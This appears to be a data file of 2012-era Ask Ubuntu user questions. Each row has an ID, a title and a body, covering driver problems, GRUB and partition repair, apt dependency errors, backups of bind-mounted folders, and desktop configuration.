187867	backing up bind mounted folders	my layout is as follows . lvm setup : /dev/vg/documents , /dev/vg/music , /dev/vg/pictures , /dev/vg/music , /dev/vg/documents , etc ... . each of the lvms is bind mounted to the corresponding folder name in /home/foo . for example , /home/foo/documents bind mounted to /media/documents ( mount point of /dev/vg/documents ) , etc . if i set up deja-dup to just back up my home folder , am i guaranteed that everything from my lvms will be backed up properly ? so let 's say i take away my lvms for some reason and choose to restore an earlier backup . my home folder will contain everything from the lvms ? all my docs , music , vids etc . my intuition tells me everything will be fine but it does n't hurt to ask the the experts ; ) . hope i have made myself clear . thanks
187874	how will 12.10 disk encryption affect performance ?	as the title suggests . massive performance degradation ? and what technology does it use ?
187875	black & white screen after resuming from suspend [ ubuntu 12.04 ]	i recently thought of giving linux a try with ubuntu 12.04 . so far i managed to figure out how to troubleshoot and fix some of my older issues . but i wasnt able to find a problem similar to mine . the issue is , whenever my laptop starts up after suspend , the screen stays black for a short while . then after that comes a black and white 8-bit kinda screen with nothing else . i am not sure if it 's an issue with the graphic card or not . because i am able to write my login password and proceed normally if i wait till this screen shows up ... after that everything is displayed normally . is there a fix for this ?
187877	nvidia driver error in 12.04 - nvidia gt 540m	i removed all packages associated with nvidia from synaptic package manager and installed nvidia-current . when i click nvidia-settings , it gives an error like this : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run `nvidia-xconfig` as root ) , and restart the x server . my laptop model is dell inspiron n5110 using nvidia geforce gt540m . please help me , i need your helps .
187878	application to view and print calendar events in a list ( using .ics files )	i use the lightning extension in mozilla thunderbird for my calendars . i 'd like to be able to view and print my calendar events in a list format like date event date event date event and so on . is there any way to make lighting do this ? or are there any other applications that could do this ?
187881	file acess slow after deletion of many files	i recently accidentally created millions of files in one folder ( rougly 5 million ) and due to limitations i could n't process them correctly ( maximum argument count exceeded for wc / ls and such stuff ) . so i deleted them , which took quite a while , but now they 're gone . i deleted the files with a regular rm . it were n't any system files . so the files are definitively deleted , but the system is very slow on file stuff now . ls , cat and auto-complete by pressing tab freezes the terminal for several seconds . is this some sort of fragmentation issue ? is it an issue with the files beeing still somehow present ?
187884	i ca n't connect to wifi network after spoofing my mac address	i 'm trying to connect to my own network but spoof my mac address : i can spoof my mac address fine , but when i try to connect to my wifi network , it wo n't let me connect . and no my network does n't have any sort of mac filtering . any suggestions ?
187886	how to solve unmet dependencies while installing fglrx on 12.04 64 bits ?	terminal output : name @ name : ~ $ sudo apt-get install fglrx-updates [ sudo ] password for name : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : fglrx-updates : depends : lib32gcc1 but it is not going to be installed depends : libc6-i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . please give a simple answer as i may not understand very complex ones .
187887	is there an easy way to repartition my hard disk ?	i partitioned my hard drive with two separate partitions for windows and ubuntu . now i want to repartition my hard-drive and i 'm not really sure on how to do it . i found some programs and tools to handle the partitions but not any info on whether it 's possible to merge the two seperated partitions again . is there a way ?
187888	what is the correct way to completely remove an application ?	i 've searched the net for such information and found different command lines , like these ones : sudo apt-get remove application sudo apt-get remove application* sudo apt-get remove -- purge application sudo apt-get remove -- purge application* sudo apt-get purge application sudo apt-get purge application* so , what is the correct way ? is it necessary to use that `` * '' ? after that , i also found these commands : sudo updatedb sudo locate application sudo rm -rf ( file/folder name ) thanks for your time .
187890	i need to know how to open lshw , also known as hardware lister	if you ca n't explain this to me then please direct me then please direct me to another hardware listing program .
187900	how do i theme the sound menu playback buttons ?	in my gtk+2/3 theme i am making for ubuntu 12.04 lts , there 's a very noticeable problem when it comes to the sound menu buttons - they are completely black with white icons : obviously , this does not fit in at all . but where do these buttons get their theming from in my theme files ? what section do i need to include so these can be themed ?
187904	are world-writable folders safe ?	is it safe to chmod a directory 777 , or is it a security risk ? one of my scripts requires that in order to run in multi-user situations , and i 'm wondering if it 's okay .
187905	display wakes up unexpectedly without activity on ubuntu 12.04	when i use lock screen with ubuntu 12.04 , all applications are hidden and a simple window asks me to enter my password to unlock the screen . after a while of inactivity , the screen goes black . however , only a few seconds after , it goes back to that window again as though the mouse had been moved , though that is not the case . is this a known bug , and if so , how to get around it , and if not , then what i am doing wrong ? thanks
187907	destroyed /usr/local partition	i 've got three partitions at installation of ubuntu 12.04 , whose mount points are : / /usr/local /home but i needed a partition so i merged /usr/local by copying all its contents into a folder named local2 . then i dismounted and formatted partition of /usr/local , and then i moved the folder local2 to /usr/local . ubuntu seems to work fine , but when i turn on pc , ubuntu start screen says ( more or less ) : /usr/local partition not found . press s to skip or m to mount it manually . how can i fix this ?
187910	bootable usb stick failing to load	after creating a bootable usb stick on my windows computer , i turned off a seperate computer , a laptop that i owned and plugged the usb stick into the computer . i turned it on and the splash screen for the manufacturer came up , in this case , acer . i waited 5 minutes and nothing changed , f2 and f12 were unresponsive . i turned off the computer , plugged the usb into my netbook and booted that up . again , it froze on the manufacturer splash , in this case , hp . when i plugged the usb back into my main computer , it is called `` install ubuntu ( e : ) '' and seemingly has all the required files on it . i booted both laptops back up after removing the usb stick and both computers rebooted windows without issue . thanks !
187914	crash report in ubuntu ... hardware problem ?	got this on my machine . i was just browsing the web on chrome and my computer froze . i recently just built this machine . i have a feeling it is a hardware problem ... possibly one of my parts arrived broken in some way ... . starting anac ( h ) ronistic cron stopping anac ( h ) ronistic cron stopping cold plug devices stopping log initial device creation starting enable remaining boot-time encrypted block devices starting configure network device security starting configure virtual network devices starting save udev log and update rules stopping configure virtual network devices stopping save udev log and update rules checking battery state ... stopping system v runlevel compatibility stopping enable remaining boot-time encrypted block devices stopping mount filesystems on boot 91.573384 ] bug : unable to handle kernel null pointer dereference at ( null ) 91.573437 ] ip : [ < ffffffff81313514 > ] strcmp+0x14/0x30 91.573470 ] pgd 1f7822067 pud 1ed7a6067 pmd 0 91.573498 ] oops : 0000 [ # 1 ] smp 91.573519 ] cpu 3 91.573531 ] modules linked in : dm_crypt bnep snd_hda_codec_realtek rfcomm bluetooth parport_pc ppdev arc4 fglrx ( p ) rt2800usb rt2800lib crc_ccitt rt2x00usb rt2x00lib mac0021 cfg80211 psmouse snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer send_seq_device snd joydev mac_hid mei ( c ) soundcore serio_raw snd_page_alloc lp parport ses enclosure usbhid hid i915 drm_kms_helper drm i2c_algo_bit mxm_umi tg_video wmi usb_storage 91.573826 ] 91.573837 ] pid : 2297 , comm : update-notifier tainted : p c o 3.2.0-29-generic # 46-ubuntu to be filled by o.e.m . to be filled by o.e.m./z77 extreme4 91.573912 ] rip : 0010 : [ < ffffffff81313514 > ] [ < ffffffff81313514 > ] strcmp+0x14/0x30 91.573954 ] rsp : 0018 : ffff8801f83f5bb8 eflags : 00010246 91.573982 ] rax : 0000000000000000 rbx : 0000000000000000 rcx : 0000000000000000 91.574019 ] rdx : 0000000000000069 rsi : 0000000000000000 rdi : ffff88021adb26f8 91.574056 ] rbp : ffff8801f83f5bb8 r08 : ffff88022f2d6e80 r09 : 0000000000000000 91.574093 ] r10 : ffff88021e7dbf00 r11 : 0000000000000003 r12 : ffff88021c10eb40 91.574130 ] r13 : 0000000000000000 r14 : ffff88021adb26f8 r15 : ffff8801f83f5d40 91.574168 ] fs : 00007f958cf53940 ( 0000 ) gs : ffff88022f2c0000 ( 0000 ) kn1gs:0000000000000000 91.574210 ] cs : 0010 ds : 0000 es : 0000 cr0 : 0000000080050033 91.574240 ] cr2 : 0000000000000000 cr3 : 000000021f6d7000 cr4 : 00000000000406e0 91.574277 ] dr0 : 0000000000000000 dr1 : 0000000000000000 dr2 : 0000000000000000 91.574314 ] dr3 : 0000000000000000 dr6 : 00000000ffff0ff0 dr7 : 0000000000000000 91.574351 ] process update-notifier ( pid : 2297 , threadinfo ffff801f83f4000 , task ffff880208fe2e00 ) 91.574397 ] stack : 91.574409 ] ffff8801f83f5be8 ffffffff811ed509 ffff88021adb26c0 ffff88021b8b7020 91.574453 ] ffff88021b461c60 fffffffffffffffe ffff8801f83f5c18 ffffffff811ed61f 91.574496 ] ffff88021adb26c0 ffff88021b8b7020 ffff8801f83f5dc8 0000000000000001 91.574539 ] call trace : 91.574558 ] [ < ffffffff811ed509 ] sysfs_find_dirent+0x59/0x110 91.574591 ] [ < ffffffff811ed61f ] sysfs_lookup+0x5f/0x110 91.574621 ] [ < ffffffff81182745 ] d_alloc_and_lookup+0x45/0x90 91.574654 ] [ < ffffffff8118fe65 ] ? d_lookup+0x35/0x60 91.574683 ] [ < ffffffff811848d2 ] do_lookup+0x202/0x310 91.574712 ] [ < ffffffff8118660c ] path_lookupat+0x11c/0x750 91.574744 ] [ < ffffffff81318db7 ] ? __strncpy_from_user+0x27/0x60 91.574778 ] [ < ffffffff81186c71 ] do_path_lookup+0x31/0xc0 91.574809 ] [ < ffffffff81187779 ] user_path_at_empty+0x59/0xa0 91.574842 ] [ < ffffffff81187822 ] ? do_filp_open+0x42/0xa0 91.574872 ] [ < ffffffff811877d1 ] user_path_at+0x11/0x20 91.574902 ] [ < ffffffff8117c80a ] vfs_fstatat+0x3a/0x70 91.574933 ] [ < ffffffff81161cff ] ? kmem_cache_free+0x2f/0x110 91.574965 ] [ < ffffffff8117c85e ] vfs_lstat+-x31/0x70 91.574993 ] [ < ffffffff8117c9fa ] sys_newlstat+0x1a/0x40 91.575022 ] [ < ffffffff81176ee1 ] ? do_sys_open+0x171/0x220 91.575053 ] [ < ffffffff8117cb1a ] ? sys_readlinkat+0x7a/0xb0 91.575086 ] [ < ffffffff81661ec2 ] system_call_fastpath+0x16/0x1b 91.575118 ] code : 83 c1 01 40 84 ff 75 ef 5d c3 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 00 55 31 c0 48 89 e5 66 2e 0f 1f 84 00 00 00 00 00 0f b6 14 07 < 3a > 14 06 75 0f 48 83 c0 01 84 d2 75 ef 31 c0 5d c3 0f 1f 00 19 91.577243 ] rip [ < ffffffff81313514 > ] strcmp+0x14/0x30 91.579314 ] rsp < ffff8801f83f5bb8 > 91.581385 ] cr2 : 0000000000000000
187915	accidentally changed bluetooth mode to off	my bluetooth device disappeared after i changed its mode from high fidelity a2dp to off . is this a bug ? how can i get my speaker back into the audio menu ? i tried disconnecting and reconnecting . but it seems that ubuntu remembers the bluetooth setting and leaves it off .
187916	mac bootable cd not loading	i '' m trying to install ( dualboot ) ubuntu on my macbook with installed mac os x mountain lion with intel processors , and am running into some issues . i can burn the disk .iso fine , but when the problem starts when i reboot ( i 'm using the refit boot loader ) . here 's what happens : i turn on and the boot loader shows up . the linux cd is not shown . i reboot from refit , which fixes the problem ( by which i mean `` boot linux cd '' shows up . i choose linux cd , and it brings me to a black screen with a spacebar blinking . that 's it . no messages . no errors . nothing . i 'd say the mac froze , but the _ cursor was constantly blinking . any help ? also , when this happens i ca n't shut the macbook down . the cursor just blinks . eventually i 'll be able to shut down by pressing the power button , but for a good half-hour at least the computer is completely unresponsive .
187921	how can i change the cryptkeeper tray icon ?	i have cryptkeeper on 12.04 working but i do n't like the icon . i want to change it to a monochrome icon but i can not find the icon location anywhere ? i looked in the /pixmaps folder and the /icon folder and it 's not there .
187926	ubuntu messed up my grub	i have windows xp installed , and i have installed fedora 15 , yesterday . updated it today to 17 , and installed ubuntu . after installing ubuntu , it messed up the grub . grub wont find fedora anymore . i have tried booting from the live cd , and installing boot-repair . it find a raid unit , asks for mdadm . tried with mdadm , and withoud dmraid . no progress . when i go to my files , in the live cd , the fedora unit shows up . what have i done wrong ? haha i think , it 's something about this raid unit .
187929	what protocols does gvfs provide in ubuntu 12.04 ? i 'd like a list of protocols for the wiki	imho the list of supported gvfs protocols could use documenting . i can do it , but i do n't know how to list the gvfs protocols that are installed , besides doing `` locate gvfs '' and i wonder if someone has already documented protocols like this afc afp webdav please answer , how to obtain a list of installed gvfs protocols . how to obtain a definitive description/specification of these protocols in general . ( generally definitive ? is that an oxymoron ? )
187930	how do i install ubuntu on an asus eeepc t91mt	i have tried ubuntu 12.04.1 in an asus eeepc t91mt ; in live cd mode it works fine ( touch screen , wifi , bluetooth , .. ) , but when i installed it and restarted the screen stay black and nothing happen ( it could be the video card driver ) . but i do not understand why in the livecd mode it works and it does not work when i install it . somebody can help me ? thanks .
187934	what 's the difference between the various printer connections ?	i 'm installing a new printer and i 'm given 4 connection options . appsocket/jetdirect network printer via dns-sd lpd network printer via dns-sd ipp network printer via dns-sd appsocket/hp jetdirect which one should i choose ? it 's a samsung clp-320 if it makes a difference .
187935	how to run a bash script in terminal but hide the terminal on startup ?	i have a backup script on start up with cuttlefish . i set it on `` run in terminal '' but i want to hide the terminal on start up . i also have the terminal in the start up applications . how do i hide the back up terminals ( 2 ) but keep my `` main '' terminal still visible ? thanks .
187936	how to install appcelerator titanium on ubuntu 12.04 ?	i downloaded the available zip file which -from its name- seems to be gtk , and when trying to run titaniumstudio as explained in the installation guide run the titaniumstudio executable i get this error msg there is no application installed for executable files . do you want to search for an application to open this file ? i do n't know how to get titanium studio up and running as the instructions is n't clear enough ! !
187944	ca n't find sftp in xbmc	according to http : //wiki.xbmc.org/index.php ? title=sftp , sftp should be available in xbmc , but i tried the current version available in the ubuntu official repository ( 11.0 ) as well as 10.1 , and it 's just not there ! i have all the other protocols like ftp , webdav , smb and so on . i 'm using ubuntu 12.04 with xfce .
187947	why ca n't the iso be verified ?	i have a macbook pro running on mountain lion . i am trying to install the newest version of ubuntu for power pc , and after trying to burn the iso onto the dvd , it says it could not verify the iso . what should i do ?
187949	trash folder in the wrong location with bound partitions	my ntfs partition is mounted as follows : /dev/sdb1 /mnt/dos ntfs permissions , locale=en_us.utf8 , uid=1000 , umask=0 0 0 i bound several folders to my home as follows : /mnt/dos/books /home/me/books none bind 0 0 /mnt/dos/music /home/me/music none bind 0 0 /mnt/dos/videos /home/me/videos none bind 0 0 /mnt/dos/pictures /home/me/pictures none bind 0 0 whenever a file is deleted in nautilus from these bound folders it gets sent to the .trash-1000 located under the bound folder rather than the one in my home directory . i do not see the contents of these additional trash folders when i click on the trash icon , so they are practically inaccessible . i do not believe this is the intended behavior . fyi : unresolved thread on ubuntuforums .
187951	internet stopped working suddenly on 12.04	my laptop was running smoothly until yesterday . today , i ca n't connect to the internet at home anymore . i am only able to access the router , but no internet access . a have a dell latitude e6320 with ubuntu 12.04 . at my job , i do n't have any problems connecting this laptop both via wireless and ethernet . at home , if i try connecting it through windows , it does work fine . i even checked the mac address and it 's ok. my other laptop , which also runs ubuntu , is not facing this problem . i have already tried to restart and downgrade network-manager package and its dependencies . can anyone help me please ? i am afraid , i will have to reinstall everything .
187954	optimum slice size for backing up data to dvd	how big should a slice be for a dvd , assuming that the file system restricts the size ? referencing : http : //ubuntu.5.n6.nabble.com/dvd-file-size-td4572772.html should slices be 1gb or so ? what 's an efficient slice size ?
187958	`` apt-get -f install '' fails with `` /usr/bin/dpkg returned an error code ( 1 ) ''	i started out trying to install cvs : $ sudo apt-get install cvs reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libcups2 : breaks : libcups2 : i386 ( ! = 1.5.3-0ubuntu3 ) but 1.5.3-0ubuntu4 is to be installed libcups2 : i386 : breaks : libcups2 ( ! = 1.5.3-0ubuntu4 ) but 1.5.3-0ubuntu3 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . but when i try this i get : $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : tzdata-java use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libcups2 the following packages will be upgraded : libcups2 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 14 not fully installed or removed . need to get 0 b/172 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error processing libcups2 ( -- configure ) : libcups2 : amd64 1.5.3-0ubuntu3 can not be configured because libcups2 : i386 is in a different version ( 1.5.3-0ubuntu4 ) dpkg : error processing libcups2 : i386 ( -- configure ) : libcups2 : i386 1.5.3-0ubuntu4 can not be configured because libcups2 : amd64 is in a different version ( 1.5.3-0ubuntu3 ) dpkg : dependency problems prevent configuration of libcupsmime1 : libcupsmime1 depends on libcups2 ( > = 1.5~ ) ; however : package libcups2 is not configured yet . dpkg : error processing libcupsmime1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libcupscgi1 : libcupscgi1 depends on libcups2 ( > = 1.4.0 ) ; however : package libcups2 is not configured yet . dpkg : error processing libcupscgi1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libcupsppdc1 : libcupsppdc1 depends on libcups2 ( > = 1.4.0 ) ; however : package libcups2 is not configured yet . dpkg : error processing libcupsppdc1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of cups-client : cups-client depends on libcups2 ( > = 1.5.0 ) ; however : package libcups2 is not configured yet . dpkg : error processing cups-client ( -- configure ) : dependency problems - leavino apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already ng unconfigured dpkg : dependency problems prevent configuration of cups-ppdc : cups-ppdc depends on libcups2 ( > = 1.4.0 ) ; however : package libcups2 is not configured yet . cups-ppdc depends on libcupsppdc1 ( > = 1.4.0 ) ; however : package libcupsppdc1 is not configured yet . dpkg : error processing cups-ppdc ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of cups : cups depends on libcups2 ( > = 1.5.0 ) ; however : package libcups2 is not configured yet . cups depends on libcupscgi1 ( > = 1.4.2 ) ; however : package libcupscgi1 is not configured yet . cups depends on libcupsmime1 ( > = 1.5.0 ) ; however : package libcupsmime1 is not configured yet . cups depends on libcupsppdc1 ( > = 1.4.0 ) ; however : package libcupsppdc1 is not configured yet . cups depends on cups-client ( > = 1.5.3-0ubuntu4 ) ; however : package cups-client is not configured yet . cups depends on cups-ppdc ; however : package cups-ppdc is not configured yet . dpkg : error processing cups ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libcupsdriver1 : libcupsdriver1 depends on libcups2 ( > = 1.4.0 ) ; however : package libcups2 is not configured yet . dpkg : error processing libcupsdriver1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of openjdk-7-jre-headless : openjdk-7-jre-headless depends on libcups2 ( > = 1.4.0 ) ; however : package libcups2 is not configured yet . dpkg : error processing openjdk-7-jre-headless ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of openjdk-7-jre : openjdk-7-jre depends on openjdk-7-jre-headless ( = 7u7-2.3.2-1ubuntu0.12.04.1 ) ; however : package openjdk-7-jre-headless is not configured yet . openjdk-7-jre depends on libcups2 ( > = 1.4.0 ) ; however : package libcups2 is not configured yet . dpkg : error processing openjdk-7-jre ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of cups-bsd : cups-bsd depends on libcups2 ( > = 1.4.0 ) ; however : package libcups2 is not configured yet . cups-bsd depends on cups-client ( = 1.5.3-0ubuntu4 ) ; however : package cups-client is not configured yet . dpkg : error processing cups-bsd ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of icedtea-7-jre-jamvm : icedtea-7-jre-jamvm depends on openjdk-7-jre-headless ( = 7u7-2.3.2-1ubuntu0.12.04.1 ) ; however : package openjdk-7-jre-headless is not configured yet . dpkg : error processing icedtea-7-jre-jamvm ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of openjdk-7-jre-lib : openjdk-7-jre-lib depends on openjdk-7-jre-headless ( > = 7~b130~pre0 ) ; however : package openjdk-7-jre-headless is not configured yet . dpkg : error processing openjdk-7-jre-lib ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libcups2 libcups2 : i386 libcupsmime1 libcupscgi1 libcupsppdc1 cups-client cups-ppdc cups libcupsdriver1 openjdk-7-jre-headless openjdk-7-jre cups-bsd icedtea-7-jre-jamvm openjdk-7-jre-lib e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've done `` apt-get update '' and `` apt-get upgrade '' and this has n't fixed the problem : $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libcups2 : breaks : libcups2 : i386 ( ! = 1.5.3-0ubuntu3 ) but 1.5.3-0ubuntu4 is installed libcups2 : i386 : breaks : libcups2 ( ! = 1.5.3-0ubuntu4 ) but 1.5.3-0ubuntu3 is installed e : unmet dependencies . try using -f .
187960	grub- error : no such partition grub rescue and error : no default or ui configuration directive found boot > on pendrive	i have dell inspiron , previously i installed ubuntu 11.10 on my windows 7 and made it dual boot . but since i want to upgrade my ubuntu version and change the partition spacing , i deleted 11.10 partition directly and extended my hardrive space ( windows + ubuntu ) at that moment everything was fine . then i prepared a 12.04 32bit usb and installed it . it was installed but is n't showing dual boot option like 11.10 and my machine directly boot into windows 7 . so instantly i again deleted my 12.04 partition . now i login into windows 7 but whenever i put usb ( with 12.04 ) to boot from it , i am facing error of `` no such partition grub rescue '' even though i try to put lower version ( 11.04 ) it showing another error `` error : no default or ui configuration directive found boot > '' i have reinstall windows 7 and reformat all partition , still i am facing same error : (
187967	how to install msmxl version 6.10.1129.0 in ubuntu ?	i am trying to install a legit copy of windows office using wine program loader . it keeps telling me to install msxml version 6.10.1129.0 , which i look up and download , execute it , and am told it installed successfully . then i go to install office and it tells me again i need to install msxml version 6.10.1129.0 . any ideas ?
187973	setting up gmail and thunderbird in 11.10	i am trying to setup my gmail with thunderbird . i put in the details , the imap and smtp settings were filled in automatically . they were correct i checked . initially when i clicked on done , to create a new account , thunderbird gave an alert telling me either the username or password is invalid . however , it was not . so i restarted thunderbird and tried to load my gmail automatically the next time and i get this error that `` thunderbird can not connect to the mail server , connection refused '' . i am in college , so i am behind a proxy server . the settings are set at use system proxy settings , just like in firefox but i need to authenticate the proxy . how do i do it ? i tried automatic configuration and no proxy settings , no change . how do i go about this problem ?
187978	sqlite2 does not work in 11.10	i have configured ubuntu 11.10 in my pc . i have installed php 5.3.6-13ubuntu3.8 . my problem is that after pc upgrade , sqlite2 is not supported in php . also sqlite3 database is locked whenever i have executed any insert/update query in php . any idea about this ? i want work on both database simultaneously .
187979	how to give different port for apache and nginx in 10.10 ?	i am curios to know how can we assign different port to apache and nginx in 10.10 . i installed nginx first then apache , so when i start my machine , nginx is taking default port : 80 . i have to manually close nginx server and start apache server . is there any we can assign different port to them so they will start on different port and will not collide ?
187982	installing system dynamic ( powersim studio 5 ) in 12.04	is there any way to install powersim studio 5 to 12.04 ? i had this software work on my previous windows xp , nevertheless , after my migration to ubuntu until now , i still can not use this software . i 've tried to installing it on 12.04 using wine , but it did n't worked . please help .
187983	how to make alt-w close current tab , not current window , in gnome shell	i 'm trying gnome shell , after moving over from unity . in unity , i 'd press ctrl+w to close the current tab , and alt+f4 to close the current window ( e.g . in gedit and firefox ) . now , in gnome shell , ctrl+w is closing the current window instead , and alt+f4 does nothing . i 've checked the menu of firefox , and it says file > close tab is ctrl+w as expected . selecting this item works also . when i right click my menubar , the minimise/maximise popup menu appears . the last menu-item is `` close '' , with the associated keyboard shortcut of ctrl+w . presumably this overrides the application-specific `` close tab '' shortcut . i checked system settings > keyboard > shortcuts and `` close window '' was set to `` disabled '' , so i 'm not sure what 's going on there ... how can i restore the expected behaviour ?
187984	ubuntu 12.04 running on low graphics mode	i have been using ubuntu for a few weeks now . i am using a hp pavillion g6 notebook . now when i try and load ubuntu it takes forever ( like 20 min or something ) then it reaches a error message telling be that it is running in low graphics mode . i am stuck on this and can not find any other posts solving this issue as it is quite specific . -james
187987	login in to the welcome screen	i have created a new account with user add , and then changed the password . i can switch user at the command line but i ban not login from the welcome login
187991	permission denied when setting the mac address	i 'm trying to set my mac address for my other computer on a newly installed ubuntu with a brand new hard drive . while doing this i got “permission denied” from siocsifflags . my question is how can i get to the root of ubuntu to get total control of my machine ?
187997	i ca n't access the root folder	i do not have access to my root folder : ubuntu says i do not have the necessary permissions to access it . i also can not access lost + found , which gives me the same error message is there anyone here that can provide answers to these questions ?
188001	finding .desktop files based on their titles ?	that 's part 2 of a question asked earlier ( to be able to give credit to the answers individually ) . when i type into the dash applications show up with their title ( also when hovering over the launcher ) , how can i find the associated desktop file . when i look into the usual suspect locations ( /usr/share/applications and ~/.local/share/applications ) with nautilus i see the titles , but not the file names ( not even in properties which sucks ) . when i look from the command line i see the file names but not the titles ( a switch would be nice ) . how can i get a listing ( a custom column ? ) that shows them next to each other ?
188004	xubuntu 12.04 vlc 2.0.3 dual monitor refresh different rates problem	i have a xubuntu 12.04 setup with nvidia gt610 proprietary driver , tv with hdmi and vga monitor . it worked perfect with 11.10 and vlc 1.1.x with 60hz on vga and 50 hz on tv . now with 12.04 and 2.0.3 vlc i ca n't have different refresh rates , video get totally messed up , tearing , jerky , out of lipsync . using 60 hz on both monitors works with the inherent problems of 50 hz video on 60 hz monitor , regular jerking . same at least wit ati adapter . any guesses ?
188010	can ubuntu launcher damage my lcd screen pixels ?	there appears something like a scar ( damaged or dead pixels ) on my lcd screen , where ubuntu launcher positions . the scar exactly fitting ubuntu launcher edges and icons . it seems a permanent scar and it stays even if i load other operating systems . can this damage be a cause of ubuntu launcher ? i know this is a stupid question , but i decided to ask here because this is exactly fitting ubuntu launcher edges and icons . i am using ubuntu 12.04 lts and samsung lcd . my system details as follows :
188016	iomega home media network hard drive 1tb cloud edition failed , data recovery ?	i have a iomega home media network drive cloud edition 1tb that started clicking and then displayed a failure led code power led and red led . i removed the sata drive and inserted in a 'all in 1 hdd docking station ' and connected to laptop by usb - laptop has win 7 os . the dock is seen as drive e but can not access and says 0 % data etc . the drive does spin up when i power the dock . web searches say the drive has ext3 file system and to use ubuntu to access drive . i have now setup a dual boot laptop but still do not see the drive using ubuntu . is there something else i need to do to get it recognised etc . i really would like to recover the data , any suggestions please ?
188020	how to do nothing when close laptop and reopen ?	i use ubuntu 12.04 64 bit . whenever i close my laptop it will disconnect my wireless connection . why is this happening ? i want my laptop do nothing when closing and reopening . or just only close monitor is also fine . is there any way to make it act this way ? thanks in advance
188031	good application for taking notes on 12.04 ?	is there a good note taking application in ubuntu like evernote exists for windows and mac users . requirements for good applications : - a thumbnail/list preview for all the created notes . an integration with the email address so that we can view the notes anywhere anytime . any easy way to input text , video , pdf , images etc . i have tried tomboy , basket notes . they are n't that good . edit : trying to install nevernote from an external source . but it has not satisfiable libssl dependency further trying to install libssl gives the following error the following information may help to resolve the situation : the following packages have unmet dependencies : libssreflect-coq : depends : coq-8.3pl3+3.12.1 but it is not installable libssreflect-ocaml : depends : libcoq-ocaml-4zyg6 but it is not installable libssreflect-ocaml-dev : depends : libcoq-ocaml-dev-4zyg6 but it is not installable e : unable to correct problems , you have held broken packages . anything that i might be doing wrong ?
188032	disable alt + tab moving windows by itself	whenever i press alt + tab , unity moves the window i 'm switching to so that the whole window is inside the screen . this behavior is excruciatingly annoying because i often move a window ( usually text editors ) partially outside the current screen so i can view another window below it ( usually a browser ) . every time i alt + tab back to the text editor , i 'm getting an unnecessary virtual screen switch , and unity is rearranging the windows behind my back . for instance , here is a browser and text editor on virtual screen 1 ( top left ) , note that the text editor is partially outside the current screen : then i alt-tab to the browser ( or clicked on it ) : next , i alt + tab again to get back to the text editor , but alt-tab switched me to virtual screen 4 ( bottom right ) because a larger percentage of the text editor window is on virtual screen 4 than in virtual screen 1 ; and the browser is no longer in the screen . also note that the text editor window moves from being on the bottom-right to the top-left , which is very disorienting as i can no longer keep track of where any of my windows are since they all keep moving around by themselves.. how do i disable this behavior ? i do n't want to have any virtual screen switch when alt + tab , especially since alt + tab does not list windows that is completely not in the current virtual screen anyway .
188034	wrong processor info	i 'm using intel i5-2430m processor which is a dual core processor , but the output of /proc/cpuinfo shows four cores . why ? is is because of hyper-threading ? if yes , is there any way i can see the actual number of cores ? also , how can i see the sizes of l1 and l2 caches ? output of /proc/cpuinfo : http : //pastebin.ubuntu.com/1206427/
188035	how can i upgrade a computer to 12.10 beta via landscape ?	i have canonical landscape managing a couple of computers . i want to upgrade one of them to ubuntu 12.10 beta . i do n't have access to the computer in question unfortunately ( it 's 400km away ) . i know that you 're not meant to upgrade the distro version without being prepared for a non-booting system etc , but i 'd still like to know if it 's possible to do with landscape , and how .
188037	can i ssh into a computer using landscape ?	i have a couple of computers that i manage using canonical landscape . both of them are behind routers and in different cities so i ca n't easily ssh into them using openssh . they 're running ubuntu 12.04 desktop edition . can i use landscape to ssh into the computers ?
188040	installing drivers for ubuntu 12.04 on macbook pro 9,1 mid 2012 15 inch	i just installed ubuntu 12.04 on my macbook pro 9,1 mid 2012 non retina 15 inch . i installed the 4 drivers from this link https : //launchpad.net/~mactel-support/+archive/ppa ? field.series_filter=precise but still i ca n't get wireless or bluetooth to work . even adaptive brightness i think is n't working . can anyone suggest where to get the complete set of drivers ? p.s . additional drivers says no proprietary devices found which is weird .
188043	how to automatically clean dhcpd.leases ?	i 'm using isc-dhcpd under ubuntu and i 'm looking for a clean and secure way to `` purge '' the leases that are expired . is there a way with dhcpd.conf ? or with a script ? is there any risks to do that ? why dhcpd does n't do it automatically for at least expired leases that are `` duplicate '' of active leases ?
